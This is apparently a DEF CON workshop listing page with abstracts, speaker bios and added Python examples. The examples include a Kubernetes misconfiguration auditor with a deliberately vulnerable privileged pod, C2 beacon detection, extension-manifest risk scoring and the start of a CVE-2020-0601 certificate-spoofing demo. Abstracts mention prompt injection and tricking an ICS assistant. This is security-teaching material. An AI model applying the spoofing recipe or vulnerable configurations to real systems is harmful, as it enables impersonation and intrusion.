Fortifying AI: Hands-On Training in Adversarial Attacks and Defense of AI Systems

Workshop Map Page – LVCCNorth-Level2-N252
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

As AI becomes integral to critical systems, its vulnerabilities to adversarial attacks and data-related weaknesses pose serious risks. This interactive, hands-on training is designed for AI practitioners, researchers, and security professionals to understand and mitigate these challenges. Participants will gain a comprehensive foundation in AI security, exploring adversarial attack techniques, defense mechanisms, and best practices for building robust datasets.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n252-09a

People:
    SpeakerBio:  Vishal “Vish” Thakur

Vishal Thakur is a seasoned expert in the information security industry, with extensive experience in hands-on technical roles specializing in Incident Response, Emerging Threats, Malware Analysis, and Research. Over the years, Vishal has developed a strong reputation for his deep technical expertise and ability to address complex security challenges.

He has shared his research and insights at prominent international conferences, including BlackHat, DEFCON, FIRST, and the SANS DFIR Summit, where his sessions have been highly regarded for their depth and practical relevance. Additionally, Vishal has delivered training and workshops at BlackHat and the FIRST Conference, equipping participants with cutting-edge skills and techniques. Vishal currently leads the Incident Response function for APAC region at Atlassian.

SpeakerBio:  John “Jlo” Lopes

John Lopes is a passionate information security professional with specialist knowledge in digital forensics and incident response (DFIR), cyber threat intelligence and offensive security practices. He has over 20 years of industry experience and a proven ability to help organisations defend and protect against cyber threats. John is a member of the Institute of Electrical and Electronics Engineers (IEEE), the International Information System Security Certification Consortium (ISC2) and the Information Systems Audit and Control Association (ISACA). John has worked in roles as part of the Global Incident Response Teams at Salesforce and AWS.




From Prompt to Protection: A Practical Guide to Building and Securing Generative AI Applications

Workshop Map Page – LVCCNorth-Level2-N254
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

This hands-on workshop explores the offensive and defensive security challenges of Generative AI (GenAI). In the first half, participants will use structured frameworks and rapid threat prototyping to map out real-world GenAI risks such as prompt injection, data poisoning, and model leakage. Working in teams, you'll threat model a GenAI system using simplified STRIDE, rapid threat prototyping techniques and visual diagrams.

The second half flips the script: you'll build lightweight security tools that harness GenAI for good. No prior AI experience is required; everything is explained as we go.

This workshop is ideal for red teamers, security engineers, and curious builders. Just bring basic Python familiarity and a laptop – we’ll supply the rest.

You’ll walk away with real-world threat models, working tool prototypes, and a clear framework for breaking and securing AI systems in your org.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n254-09p

People:
    SpeakerBio:  Ashwin Iyer, Visa Inc – M&A Security Architecture (Director)

Ashwin Iyer is a cybersecurity architect with 12+ years of experience across red teaming, threat modeling, and cloud security. He currently leads offensive security for mergers and acquisitions at Visa Inc., conducting advanced penetration tests and threat evaluations of critical financial infrastructure.

Previously at SAP Ariba, he built and led the red team program, developing internal CTFs, defining SOC SLAs, and identifying high-impact vulnerabilities across global B2B platforms.

Ashwin is an EC-Council CodeRed instructor (Session Hijacking & Prevention), a reviewer for Hands-On Red Team Tactics (Packt), and a contributor to PCI SSC's segmentation guidance for modern networks. He has delivered hands-on workshops at BSidesSF, HackGDL, and Pacific Hackers on topics such as GenAI threat modeling and practical threat modeling for Agile teams.

He holds certifications including OSCP, OSEP, GCPN, OSMR, CTMP and a few others. When not hacking cloud platforms or vendor portals, he's mentoring teams on how to think like attackers.

SpeakerBio:  Ritika Verma, AI Security Research Assistant

Ritika Verma is a cybersecurity engineer and AI security researcher with 7.5+ years of experience across enterprise security, cloud infrastructure, and applied AI. She has led security initiatives at SAP and Accenture, where she implemented MITRE ATT&CK frameworks, automated detection pipelines, and secured large-scale IAM and DLP environments.

Currently pursuing her MS in Information Systems with an AI/ML focus at Santa Clara University, Ritika researches LLM security, RAG pipelines, and GenAI abuse patterns. Her open-source projects — including an AWS vulnerability triage agent (VISTA), a RAG-based compliance engine, and a CI/CD DevSecOps pipeline — reflect her obsession with bridging security engineering and real-world AI applications.

She has placed 2nd in a Pre-Defcon CTF hosted at Google, mentored future security talent through WiCyS and NIST/NICE, and served as President of the SCU AI Club. Ritika is passionate about building secure-by-default systems, mentoring women in cybersecurity, and rethinking how LLMs are evaluated and abused in production environments.




Hacker VPN

Workshop Map Page – LVCCNorth-Level2-N257
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

The Internet is a dangerous place. Fortunately, hackers have created tools to make it safer. VPNs hide your IP address from the sites you visit but still expose it to the VPN provider. Companies claim not to log, but how quickly will they hand over our data when they receive a warrant? Tor reroutes traffic through volunteer relays, but performance suffers as a result. Can we trust these distributed networks? Who owns the exit nodes? Finally, apps like Signal offer E2EE secure comms, but in a proprietary and siloed way. Open source means very little if an app operates in a walled garden. Are there back doors? Is our data really safe?

In this workshop we’ll create a Hacker VPN that combines the best of VPNs, Tor, and E2EE secure comms apps. We’ll use modern-day PQC encryption to implement a secure protocol. We’ll use both TCP/UDP as our network protocols to demonstrate flexibility in design. We’ll support packet sharding, random noise injection, multi-hop routing, and 100% anonymity between network endpoints. We’ll do all this on Linux with standard C++, CMake & OpenSSL. At the end of this workshop you’ll have all the tools you need to take the Hacker VPN to the next level. Why trust outdated software from shady companies when you can build your own modern day, kick-ass implementation?

Yes, the Internet is a dangerous place. But it’s much safer when we take control.
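An added illustration of three of the features listed above (packet sharding, random noise injection and fixed-size records), written for this page and not taken from Code Siren's Hacker VPN code: a sender splits a message into equal-size shards, mixes in decoy records and shuffles them, and a receiver reassembles only complete messages. The header layout, MAGIC value and 64-byte body are assumptions for the demo. In a real implementation each record would be the plaintext of one AEAD envelope under a key agreed through a PQC KEM, so the kind and index fields are never visible on the wire; the encryption and multi-hop layers are out of scope here.

```python
import random
import struct

MAGIC = 0x5A
KIND_DATA, KIND_NOISE = 0, 1
HEADER = struct.Struct("<BBIHHH")   # magic, kind, msg_id, index, total, body_len
BODY = 64                            # every record carries exactly this many body bytes
RECORD_SIZE = HEADER.size + BODY     # 12 + 64 = 76 bytes on the wire, always


def shard(msg_id: int, payload: bytes, noise_ratio: float, rng: random.Random) -> list:
    """Split payload into fixed-size records, add decoy records, shuffle the order.

    All records are the same length, and (once encrypted as a whole) an
    observer sees only a stream of equal-size blobs: which carry data, which
    are noise, and their true order are hidden. Short chunks are padded with
    random bytes rather than zeros so padding is not a tell either."""
    chunks = [payload[i:i + BODY] for i in range(0, len(payload), BODY)] or [b""]
    total = len(chunks)
    records = []
    for idx, chunk in enumerate(chunks):
        pad = bytes(rng.getrandbits(8) for _ in range(BODY - len(chunk)))
        records.append(HEADER.pack(MAGIC, KIND_DATA, msg_id, idx, total, len(chunk)) + chunk + pad)
    for _ in range(int(total * noise_ratio) + 1):
        body = bytes(rng.getrandbits(8) for _ in range(BODY))
        records.append(HEADER.pack(MAGIC, KIND_NOISE, rng.getrandbits(32), 0, 0, 0) + body)
    rng.shuffle(records)
    return records


def reassemble(records: list) -> dict:
    """Rebuild messages from an unordered record list; returns {msg_id: payload}.

    Noise is dropped, malformed headers are rejected, and incomplete messages
    are withheld so a lost shard never yields a silently truncated message."""
    parts, totals = {}, {}
    for rec in records:
        if len(rec) != RECORD_SIZE:
            raise ValueError("record size mismatch")
        magic, kind, msg_id, idx, total, body_len = HEADER.unpack_from(rec)
        if magic != MAGIC or kind != KIND_DATA:
            continue                      # decoy, or not ours
        if body_len > BODY or idx >= total:
            raise ValueError("malformed shard header")
        parts.setdefault(msg_id, {})[idx] = rec[HEADER.size:HEADER.size + body_len]
        totals[msg_id] = total
    out = {}
    for msg_id, pieces in parts.items():
        if len(pieces) == totals[msg_id]:
            out[msg_id] = b"".join(pieces[i] for i in range(totals[msg_id]))
    return out


if __name__ == "__main__":
    rng = random.Random(7)                         # seeded only so the demo is repeatable
    message = b"hello from the hacker vpn " * 9    # constructed 234-byte payload -> 4 shards
    wire = shard(1, message, noise_ratio=0.5, rng=rng)
    print(f"{len(wire)} records of {RECORD_SIZE} bytes each, "
          f"{sum(r[1] == KIND_NOISE for r in wire)} of them noise")
    print(reassemble(wire)[1] == message)
```

Reassembly state is where a receiver gets hurt in practice: cap the number of in-flight message ids and expire partial messages, or a peer can fill memory with shards that never complete.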

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n257-09p

People:
    SpeakerBio:  Eijah, CEO, Founder at Code Siren, LLC

Eijah is the founder of Code Siren, LLC and has 25+ years of experience in software development. He is the creator of Polynom, the world’s first CNSA Suite 2.0 PQC collaboration app. He is also the developer of Demonsaw, an encrypted communications platform that allows you to share information without fear of data collection or surveillance. Before that Eijah was a Lead Programmer at Rockstar Games where he created Grand Theft Auto V and Red Dead Redemption 2. In 2007, Eijah hacked multiple implementations of the Advanced Access Content System (AACS) protocol and released the first Blu-ray device keys under the pseudonym, ATARI Vampire. He has been a faculty member at multiple colleges, has spoken at DEF CON and other security conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.

SpeakerBio:  Benjamin “Cave Twink” Woodill

Benjamin is a technology professional and lifelong hacker whose journey began with an Amiga 1000 and an endless sense of curiosity. He taught himself how to keep it running—troubleshooting, repairing failed components, and learning the ins and outs of the machine. From there, he moved on to DOS on a Packard Bell and eventually to building custom systems. That early hands-on experience evolved into a career spanning multiple industries and roles, where he designed, deployed, and managed complex networks and systems. While hardware remains a passion, his current work focuses on secure communications and building tools for resilient network infrastructure. When he’s not buried in RFCs, technical docs, or writing integrations, Benjamin is likely rock climbing or exploring underwater cave systems—boldly going where no man has gone before.




Hacking the connected plant: AI edition!

Workshop Map Page – LVCCNorth-Level2-N254
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

Tired of legacy ICS systems? Attend this workshop to hack the next generation of Industrial Control Systems! No more Modbus, no more standard PLCs, no more Purdue model! This workshop is designed to show what the future might look like for Industrial Control Systems, with a focus on ML and AI!

We’ll bring a realistic ICS setup that features all the fancy current and future trends: SD-WAN and Zero Trust, OPC-UA, MQTT, Digital Twin, Edge devices and soft-PLCs to control a small-scale industrial process simulation. This year, we’ll also add some machine learning and LLM challenges! Will you be able to trick the ICS virtual assistant into giving you access to the production systems?

After a short introduction, we’ll get into hacking! We will walk you through a CTF-style exercise to go from 0 to full industrial process hacking! The CTF will be guided so that everyone learns something and gets a chance to get most flags!

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n254-10a

People:
    SpeakerBio:  Arnaud Soullié, Senior Manager at Wavestone

Arnaud Soullié is a Senior Manager at Wavestone, a global consulting company. For 15 years, he has been performing security assessments and pentests on all types of targets. He started specializing in ICS cybersecurity 10 years ago. He has spoken at numerous security conferences on ICS topics, including: BlackHat Europe, BruCon, 4SICS, BSides Las Vegas, and DEFCON. He is also the creator of the DYODE project, an open source data diode aimed at ICS. He has taught ICS cybersecurity trainings since 2015.

SpeakerBio:  Alexandrine Torrents, Senior Manager at Wavestone

Alexandrine Torrents is a Senior Manager at Wavestone. She started as a penetration tester, and performed several cybersecurity assessments on ICS. She worked on a few ICS models to demonstrate attacks on PLCs and developed a particular tool to request Siemens PLCs. Then, she started working at securing ICS, especially in the scope of the French military law, helping companies offering a vital service to the nation to comply with security rules. Now, Alexandrine works with different industrial CISOs on their cybersecurity projects: defining secure architectures, hardening systems, implementing detection mechanisms. She is also IEC 62443 certified and still performs assessments on multiple environments.




Hacking The Metal: Into the GPU

Workshop Map Page – LVCCNorth-Level2-N256
When:  Saturday, Aug 9, 14:00 – 17:59 PDT

There is a creature that lives inside our smartphones, laptops, and PCs, quietly driving their most cutting-edge behaviors. Much larger versions of it hide in datacenters around the world, constantly crunching through massive computation problems. And yet, even experienced engineers find it mysterious. Originally made to boost graphics performance, it has evolved into the engine that powers technologies behind systems like Claude and ChatGPT. In this workshop, we will uncover the nature of this creature: the GPU. Starting with its history and evolution, we will explore how a processor meant to accelerate 3D graphics became the driving force behind modern machine learning and AI. Along the way, we will dive into the design and behavior of neural networks, and discover how a machine built for graphics rendering learned to interpret images and speak human language. Finally, we will investigate how the complexity of neural networks made possible by GPUs can lead to unexpected and strange behaviors… some of which may not be accidental.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n256-09p

People:
    SpeakerBio:  eigentourist

Eigentourist is a programmer who learned the craft in the early 1980s. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it’s hard to tell which was which. Today, he works on systems integration and engineering in the healthcare industry.




Hands-on IoT firmware extraction and flash forensics

Workshop Map Page – LVCCNorth-Level2-N258
When:  Sunday, Aug 10, 09:00 – 12:59 PDT

Did you ever want to hack an IoT device but did not know how to start? Having UART is nice, but it does not help in many cases.

For a complete analysis of an IoT device, it is required to look at the firmware itself. In most cases this means that the firmware, data or encryption keys need to be extracted from the device memory. Many researchers are hesitant to do that as there is a high risk of destroying the device or leaving it in an inoperable state. In this workshop we will look at different flash memory types (EEPROM, SPI flash, NAND flash, eMMC flash) and how to extract the information from them.

We will show that you do not need very expensive hardware to achieve your goal and that it is not as complicated as everyone believes. See which tools might be useful for your own lab!

Participants will work in groups and will be provided with different kinds of IoT devices (e.g. smart speakers). After a tear-down, you can use different chip-off methods (e.g. hot air, IR soldering) to remove the flash chip and read it out. Optionally, the tools to re-ball and re-solder the IC will be available after the workshop. In the end, each team should have the data and a functional device again.

Bonus: If you brick the device, you can keep the parts as a souvenir or can wear them as badges.

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n258-10a

People:
    SpeakerBio:  Dennis Giese, IoT Security&Privacy researcher

Dennis Giese is a researcher with the focus on the security and privacy of IoT devices. While being interested in physical security and lockpicking, he enjoys applied research and reverse engineering malware and all kinds of devices. His most known projects are the documentation and hacking of various vacuum robots. He calls himself a “robot collector” and his current vacuum robot army consists of over 80 different models from various vendors. He talked about his research at the Chaos Communication Congress, REcon, HITCON, NULLCON, and DEFCON.

SpeakerBio:  Braelynn Luedtke, Security Researcher

Braelynn is a security consultant at Leviathan Security Group where she conducts security assessments of products for startups, Fortune 500 companies, and everything in between. She enjoys partaking in CTFs and researching the security of anything that piques her curiosity. She has previously presented this research at conferences such as Chaos Communication Congress, HITCON and DEFCON.




Hands-on Kubernetes Attack & Defense Masterclass

Workshop Map Page – LVCCNorth-Level2-N255
When:  Friday, Aug 8, 14:00 – 17:59 PDT

Kubernetes has transformed how we deploy applications, but its complexity has created a new attack surface that threat actors actively exploit. This workshop delivers practical experience exploiting and defending against dangerous misconfigurations found in production environments.

Based on extensive research and the popular Kubernetes Goat platform, you’ll work through realistic attack scenarios including privilege escalation, container escapes, lateral movement, and persistence techniques. For each vulnerability exploited, you’ll implement corresponding defenses using Kubernetes-native controls.

Our pre-configured environment with vulnerable applications lets you focus on mastering both offensive and defensive techniques. You’ll gain:

  • Hands-on experience exploiting critical misconfigurations
  • Methodology for identifying vulnerabilities in your clusters
  • Skills implementing defenses across the Kubernetes lifecycle
  • Ready-to-use templates for securing production environments

Whether securing Kubernetes or adding cloud-native exploitation to your skillset, this workshop delivers actionable knowledge through guided practice rather than abstract concepts.
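An added example, not from Kubernetes Goat or the workshop: a small audit function over a Pod manifest that flags the misconfigurations behind the privilege escalation and container escape scenarios above, next to a constructed vulnerable Pod and its hardened counterpart. The rule set is a subset of what Pod Security Admission's `restricted` profile enforces; the manifests are illustrations, not complete production templates.

```python
import json

DANGEROUS_CAPS = {"SYS_ADMIN", "NET_ADMIN", "SYS_PTRACE", "SYS_MODULE", "ALL"}


def audit_pod(pod: dict) -> list:
    """Return (rule, location) findings for a Pod manifest parsed from YAML/JSON."""
    findings = []
    spec = pod.get("spec", {})
    name = pod.get("metadata", {}).get("name", "<pod>")
    for key in ("hostPID", "hostNetwork", "hostIPC"):   # host namespaces: escape made easy
        if spec.get(key):
            findings.append((key, name))
    if spec.get("automountServiceAccountToken", True):  # token in every pod = lateral movement
        findings.append(("automountServiceAccountToken", name))
    for vol in spec.get("volumes", []):
        hp = vol.get("hostPath")
        if hp:                                            # node filesystem inside the container
            findings.append(("hostPath:" + hp.get("path", "?"), vol.get("name", "?")))
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        sc = c.get("securityContext", {})
        cname = c.get("name", "?")
        if sc.get("privileged"):
            findings.append(("privileged", cname))
        if sc.get("allowPrivilegeEscalation", True):      # default is True: setuid binaries work
            findings.append(("allowPrivilegeEscalation", cname))
        if not sc.get("runAsNonRoot"):
            findings.append(("runAsRoot", cname))
        caps = sc.get("capabilities", {})
        for cap in caps.get("add", []):
            if cap.upper() in DANGEROUS_CAPS:
                findings.append(("capability:" + cap, cname))
        if "ALL" not in [x.upper() for x in caps.get("drop", [])]:
            findings.append(("capabilitiesNotDropped", cname))
    return findings


# Constructed "debug" pod of the kind found in real clusters: one kubectl exec away from root on the node
VULNERABLE = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "debug-shell"},
    "spec": {
        "hostPID": True,
        "volumes": [{"name": "rootfs", "hostPath": {"path": "/"}}],
        "containers": [{
            "name": "shell", "image": "alpine",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"name": "rootfs", "mountPath": "/host"}],
        }],
    },
}

# The same workload shape with the Kubernetes-native controls applied
HARDENED = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "web"},
    "spec": {
        "automountServiceAccountToken": False,
        "volumes": [{"name": "tmp", "emptyDir": {}}],
        "containers": [{
            "name": "web", "image": "nginxinc/nginx-unprivileged",
            "securityContext": {
                "privileged": False,
                "allowPrivilegeEscalation": False,
                "runAsNonRoot": True,
                "readOnlyRootFilesystem": True,
                "capabilities": {"drop": ["ALL"]},
            },
            "volumeMounts": [{"name": "tmp", "mountPath": "/tmp"}],
        }],
    },
}


def audit_pod_list(pod_list: dict) -> dict:
    """Audit the output of `kubectl get pods -A -o json`; returns {namespace/name: findings}."""
    report = {}
    for item in pod_list.get("items", []):
        meta = item.get("metadata", {})
        key = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        report[key] = audit_pod(item)
    return report


if __name__ == "__main__":
    for pod in (VULNERABLE, HARDENED):
        print(pod["metadata"]["name"], json.dumps(audit_pod(pod)))
```

On a live cluster, pipe `kubectl get pods -A -o json` into `audit_pod_list`. The durable fix is the namespace label `pod-security.kubernetes.io/enforce: restricted`, which rejects specs like the first one at admission instead of finding them afterwards.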

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n255-08p

People:
    SpeakerBio:  Madhu “madhuakula” Akula, Pragmatic Security Leader

Madhu Akula is a pragmatic security leader and the creator of Kubernetes Goat, an intentionally vulnerable-by-design Kubernetes cluster for learning and practicing Kubernetes security. He is also a published author and Cloud Native Security Architect with extensive experience, and an active member of the international security, DevOps, and Cloud Native communities (null, DevSecOps, AllDayDevOps, AWS, CNCF, USENIX, etc.). He holds industry certifications such as CKA (Certified Kubernetes Administrator), CKS (Certified Kubernetes Security Specialist), and OSCP (Offensive Security Certified Professional).

Madhu frequently speaks and runs training sessions at security events and conferences around the world including DEFCON 24, 26, 27, 28, 29 & 30, BlackHat 2018, 19, 21 & 22, USENIX LISA 2018, 19 & 21, SANS Cloud Security Summit 2021 & 2022, O’Reilly Velocity EU 2019, Github Satellite 2020, Appsec EU (2018, 19 & 22), All Day DevOps (2016, 17, 18, 19, 20 & 21), DevSecCon (London, Singapore, Boston), DevOpsDays India, c0c0n(2017, 18), Nullcon 2018, 19, 21 & 22, SACON, Serverless Summit, null and multiple others.

His research has identified vulnerabilities in over 200 companies and organizations, including Google, Microsoft, LinkedIn, eBay, AT&T, WordPress, NTOP, and Adobe, and he is credited with multiple CVEs, acknowledgements, and rewards. He is co-author of Security Automation with Ansible 2 (ISBN-13: 978-1788394512), which is listed as a technical resource by Red Hat Ansible, and the technical reviewer for the Learn Kubernetes Security and Practical Ansible 2 books from Packt. He also won first prize for building an infrastructure security monitoring solution at the InMobi flagship hackathon among 100+ engineering teams.




Hands-On Threat Hunting with Wireshark

Workshop Map Page – LVCCNorth-Level2-N253
When:  Saturday, Aug 9, 09:00 – 12:59 PDT

What threats are hidden in network traffic? In this hands-on course, we’ll show you how to spot malicious activity hiding in plain sight. Learn how to filter noise, detect C2 traffic, and uncover stealthy attacks using real-world packet captures. Whether you’re into blue teaming, incident response, or just love dissecting packets, this session will sharpen your network forensics skills!
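An added example, not Chris Greer's course material: one of the simplest ways to spot C2 in a capture is to look for connections that recur at suspiciously regular intervals. The flow records below are constructed (TEST-NET addresses), the `parse_tshark_fields` helper expects the tab-separated output of the `tshark -T fields` command named in its docstring, and the thresholds are starting points rather than tuned values.

```python
import statistics
from collections import defaultdict

# Constructed flow records: (timestamp in seconds, src, dst, dst_port)
FLOWS = [
    # 10.0.0.4 -> 203.0.113.5:443 roughly every 60 s: looks like an implant check-in
    (0, "10.0.0.4", "203.0.113.5", 443), (60, "10.0.0.4", "203.0.113.5", 443),
    (121, "10.0.0.4", "203.0.113.5", 443), (180, "10.0.0.4", "203.0.113.5", 443),
    (241, "10.0.0.4", "203.0.113.5", 443), (300, "10.0.0.4", "203.0.113.5", 443),
    (359, "10.0.0.4", "203.0.113.5", 443),
    # same host browsing 198.51.100.20:443 at human pace
    (5, "10.0.0.4", "198.51.100.20", 443), (8, "10.0.0.4", "198.51.100.20", 443),
    (48, "10.0.0.4", "198.51.100.20", 443), (55, "10.0.0.4", "198.51.100.20", 443),
    (175, "10.0.0.4", "198.51.100.20", 443), (190, "10.0.0.4", "198.51.100.20", 443),
    # two DNS queries: too few samples to judge
    (12, "10.0.0.4", "10.0.0.53", 53), (400, "10.0.0.4", "10.0.0.53", 53),
]


def parse_tshark_fields(text: str) -> list:
    """Parse lines produced by
    tshark -r capture.pcap -T fields -e frame.time_epoch -e ip.src -e ip.dst -e tcp.dstport
    (tab separated). Non-TCP rows have an empty dstport column and are skipped."""
    flows = []
    for line in text.splitlines():
        cols = line.split("\t")
        if len(cols) != 4 or not cols[3]:
            continue
        flows.append((float(cols[0]), cols[1], cols[2], int(cols[3])))
    return flows


def find_beacons(flows: list, min_samples: int = 5, max_cv: float = 0.15) -> list:
    """Score every (src, dst, port) pair by the regularity of its connection gaps.

    cv is the coefficient of variation (stddev / mean) of the inter-arrival
    times: near 0 means metronomic, which humans and most legitimate
    software are not. Pairs with too few samples are not scored at all."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)
    results = []
    for key, times in by_pair.items():
        if len(times) < min_samples:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean == 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        results.append({"pair": key, "n": len(times), "mean_gap": round(mean, 1),
                        "cv": round(cv, 3), "beacon": cv <= max_cv})
    return sorted(results, key=lambda r: r["cv"])


if __name__ == "__main__":
    for r in find_beacons(FLOWS):
        flag = "BEACON?" if r["beacon"] else ""
        print(f"{r['pair'][0]} -> {r['pair'][1]}:{r['pair'][2]}  n={r['n']}  "
              f"mean gap {r['mean_gap']}s  cv={r['cv']}  {flag}")
```

Malware that jitters its sleep interval will push the coefficient of variation above 0.15, so also look at the distribution of gaps (a jittered beacon still clusters tightly around one mean) and at the near-constant payload size of each check-in. In Wireshark, `ip.addr == 203.0.113.5 && tcp.port == 443` followed by Statistics > Conversations gives the same per-pair view for a quick manual check.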

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n253-09a

People:
    SpeakerBio:  Chris Greer, Packet Analyst

Chris is a Packet Analyst at Packet Pioneer, specializing in network performance analysis and forensics using Wireshark. Whether he’s investigating complex issues at the packet level or leading hands-on training sessions, Chris is passionate about helping others master the art of packet analysis.

As a certified instructor and active contributor to the Wireshark Foundation, he regularly teaches interactive Wireshark courses for audiences of all sizes. Chris also shares bite-sized tips, analysis techniques, and troubleshooting strategies on his YouTube channel—making network forensics more accessible to analysts at every level.




Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk

Workshop Map Page – LVCCNorth-Level2-N256
When:  Friday, Aug 8, 09:00 – 12:59 PDT

Browser extensions have quietly become one of the most underappreciated attack surfaces. While marketed as productivity enhancers, many of these extensions operate with elevated privileges that rival native malware in terms of access to sensitive user and organizational data.

This hands-on workshop takes a deep dive into how browser extensions operate under the hood and exposes how easily legitimate APIs can be weaponized to exfiltrate credentials, hijack sessions, monitor user behavior, and leak sensitive corporate information. By reverse-engineering real-world extension behavior and building functioning proof-of-concept (PoC) malicious extensions, participants will gain a direct understanding of the risks these extensions pose.

Through practical exercises, participants will:

  • Learn the browser extension architecture and permission model
  • Examine key APIs commonly misused for surveillance or data theft
  • Build PoC malicious extensions that exfiltrate session cookies, read passwords, record keystrokes, capture DOM content, and more
  • Analyze techniques for stealth, obfuscation, and evasion
  • Explore detection blind spots in endpoint and SSE security tools
  • Review mitigation strategies and enterprise hardening recommendations
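As an added example (not from LayerX or the workshop), here is the defensive counterpart to building a PoC: a risk assessment of an extension's manifest.json that scores the permissions and content-script settings a malicious extension needs in order to do the things listed above. The sample manifest is constructed; the scores and verdict thresholds are arbitrary and meant to be tuned to your allow-list process.

```python
import json

# Permissions that, on their own, give an extension what the PoCs above rely on
HIGH_RISK_PERMISSIONS = {
    "cookies": "read/write session cookies of every granted host (session hijacking)",
    "webRequest": "observe every request, including headers",
    "webRequestBlocking": "modify or redirect requests in flight",
    "tabs": "enumerate URLs and titles of every open tab",
    "history": "full browsing history",
    "clipboardRead": "read whatever the user copies (passwords, tokens)",
    "debugger": "attach the DevTools protocol to any page",
    "nativeMessaging": "talk to a native binary outside the browser sandbox",
    "scripting": "inject scripts into pages on demand",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def assess_manifest(manifest: dict) -> dict:
    """Score a parsed manifest.json; returns {"score", "findings", "verdict"}."""
    findings, score = [], 0
    mv = manifest.get("manifest_version", 2)
    perms = set(manifest.get("permissions", []))
    # MV2 put host patterns in "permissions"; MV3 moved them to "host_permissions"
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "://" in p or p == "<all_urls>"}
    if mv < 3:
        findings.append(("manifest_v2", "remotely hosted code and eval-style CSP still possible"))
        score += 2
    for p in sorted(perms & set(HIGH_RISK_PERMISSIONS)):
        findings.append((p, HIGH_RISK_PERMISSIONS[p]))
        score += 3
    if hosts & BROAD_HOSTS:
        findings.append(("broad_host_permissions", "API access applies to every site the user visits"))
        score += 4
    for cs in manifest.get("content_scripts", []):
        broad = bool(set(cs.get("matches", [])) & BROAD_HOSTS)
        if broad and cs.get("run_at") == "document_start":
            findings.append(("content_script", "runs before page JS on every site: can hook DOM APIs, read forms and keystrokes"))
            score += 3
        elif broad:
            findings.append(("content_script", "DOM access on every site"))
            score += 2
    csp = manifest.get("content_security_policy")
    csp_text = csp if isinstance(csp, str) else (csp or {}).get("extension_pages", "")
    if "unsafe-eval" in csp_text:
        findings.append(("unsafe_eval", "extension pages may eval() downloaded strings"))
        score += 2
    verdict = "block" if score >= 8 else "review" if score >= 4 else "allow"
    return {"score": score, "findings": findings, "verdict": verdict}


# Constructed manifest of a plausible "productivity" extension
SAMPLE_MANIFEST = json.loads("""
{
  "manifest_version": 3,
  "name": "Tab Tidy Pro",
  "version": "1.4.2",
  "permissions": ["cookies", "tabs", "webRequest", "storage", "clipboardRead"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["hook.js"],
                       "run_at": "document_start", "all_frames": true}]
}
""")

if __name__ == "__main__":
    report = assess_manifest(SAMPLE_MANIFEST)
    print(report["verdict"], report["score"])
    for rule, why in report["findings"]:
        print(f"  {rule}: {why}")
```

A high score is a reason to look, not proof of malice; a password manager legitimately needs several of these permissions. The manifest also says nothing about what the code does at runtime, which is why dynamic analysis of the extension's behaviour is the other half of detection.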

Links:
    Registration (July 15) – https://events.humanitix.com/dc33ws-n256-08a

People:
    SpeakerBio:  Or Eshed, CEO at LayerX Security

Or Eshed is CEO and co-founder at LayerX Security. Prior to founding LayerX, Or worked for 12 years as a cybersecurity and OPSEC expert at ABN AMRO Bank, Otorio, and Check Point, where he led the takedown of the world’s largest browser hijacking operation with over 50M browsers compromised, and his work led to the arrest of more than 15 threat actors. Or also has an MSc in Applied Economics from the Hebrew University of Jerusalem.

SpeakerBio:  Aviad Gispan, Senior Researcher at LayerX Security

Aviad Gispan is a Senior Researcher at LayerX Security, with over a decade of experience in browser security, JavaScript, and frontend architecture. He develops sandbox technologies to detect malicious extensions and researches advanced techniques to strengthen browser-based protection. Previously, Aviad led innovation in Proofpoint’s Web Isolation group, focusing on performance optimization and resource efficiency.




Introduction to Cryptographic Attacks

Workshop Map Page – LVCCNorth-Level2-N255
When:  Friday, Aug 8, 09:00 – 12:59 PDT

Using cryptography is a subtle practice, and mistakes can result in significant vulnerabilities. This workshop will cover many of these vulnerabilities as they have shown up in the real world, including CVE-2020-0601 (the Windows CryptoAPI ECC certificate validation flaw). This will be a hands-on workshop where you will implement the attacks after each one is explained. I will provide a VM with a tool written in Python to execute the attacks. A good way to determine if this workshop is for you is to look at the challenges at cryptopals.com: if they look interesting but you could use in-person help understanding the attacks, this is for you. While not a strict subset of those challenges, there is significant overlap. The exercises will range from decrypting ciphertext to recovering private keys through public-key attacks, ending with producing TLS certificate and SSH private key files from the recovered keys.
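An added example, not the workshop's VM tool: the core of CVE-2020-0601 in pure Python. The real bug was in Windows CryptoAPI's handling of X.509 certificates carrying explicit ECC parameters, which were matched against a trusted root by public key alone; the curve below is secp256k1 (standard constants) purely because its parameters are short to write down, the attack is the same on any curve. Given the victim's public key Q, the attacker picks a private key d' of their own and derives a generator G' such that d' * G' = Q; a verifier that accepts the attacker-supplied curve parameters then accepts the attacker's ECDSA signatures as the victim's. The ECDSA here is textbook, uses a hash-derived nonce so the demo is deterministic, and is not constant-time.

```python
import hashlib

# secp256k1 (standard, public constants)
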